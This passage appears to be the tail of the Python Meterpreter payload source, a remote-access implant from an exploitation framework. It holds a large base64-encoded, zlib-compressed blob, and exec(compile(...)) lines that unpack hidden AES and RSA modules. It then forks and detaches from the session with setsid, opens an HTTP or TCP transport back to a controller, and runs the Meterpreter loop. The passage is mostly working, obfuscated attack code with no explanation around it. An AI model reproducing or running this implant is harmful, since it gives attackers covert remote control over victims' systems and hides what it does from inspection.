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')[0])),'met_aes','exec'), met_aes.__dict__)
exec(compile(zlib.decompress(base64.b64decode(codecs.getencoder('utf-8')('eNqdVE2PmzAQPYdf4R4ibOFEwVFWq2jdQ0899Q9EKDKxU6wCRjZ003/f8Qdhm2572AuYzHtv5s14kuluMHZE7pejnRgbakUvTUdr3Qt30RoJh2pBjcuu1nTIjXa6jCiRpn4Qlx8eMr0X9sFMO4a4l9/+VNZp0591fzWnXfWyz6S6onrENTlmK31FAIXDyqpxsj2qs/lkrARMRDMd4Smke6CLbc3EuVE3CNHyKSI1q7H2yIbn61u+1iFFq3rckDXjvPSpGsTzXV40IdabcS6h4c1W9RcjFc6n8bp5zsk9JaQTrA7pmpjKOgwdSibEyVScgyvvHudfcrq7PZeELM7wFH4GYFFWBDpBWWFAX7WJjjhHDwLsUeDz16RwNMU+quy9SqgHepTqoQZxKM9/zgZwfTJA0hWFx9zVTt2nUIPWpwcD+90f+b+ZXlH/ANEzNTFDSRLdPNDZP7m4g7p4LLf4AF9xQBfsWC3e4H50hPqXItGcVNbbk8me/JA9Gey9NrpVyLz4WxT0ouDfA58FV6bgcdoyzYqFWUEoTPs97u6wcNl/gfsEvNcYm7hsUPAdElckKDl1XOJvfcZrLM5w6TE0jHbuu9fuqOJz/5QlfplSAb4CmEy2knwpCT5bzg5Pm7hm4eWVNrFh2Wrgxm2n+BeDDyUjW6uGVlzUG1+ExnNOlp3zyzyY1zDephhOx7YqZOGlqaIdAH8DRgdeJA==')[0])),'met_rsa','exec'), met_rsa.__dict__)
sys.modules['met_aes'] = met_aes
sys.modules['met_rsa'] = met_rsa
import met_rsa, met_aes
def met_rsa_encrypt(der, msg):
    return met_rsa.rsa_enc(der, msg)
def met_aes_encrypt(key, iv, pt):
    return met_aes.AESCBC(key).encrypt(iv, pt)
def met_aes_decrypt(key, iv, pt):
    return met_aes.AESCBC(key).decrypt(iv, pt)
    

_try_to_fork = TRY_TO_FORK and hasattr(os, 'fork')
if not _try_to_fork or (_try_to_fork and os.fork() == 0):
    if hasattr(os, 'setsid'):
        try:
            os.setsid()
        except OSError:
            pass

    if HTTP_CONNECTION_URL and has_urllib:
        transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT,
                http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE)
    else:
        # PATCH-SETUP-STAGELESS-TCP-SOCKET #
        transport = TcpTransport.from_socket(s)
    met = PythonMeterpreter(transport)
    # PATCH-SETUP-TRANSPORTS #
    met.run()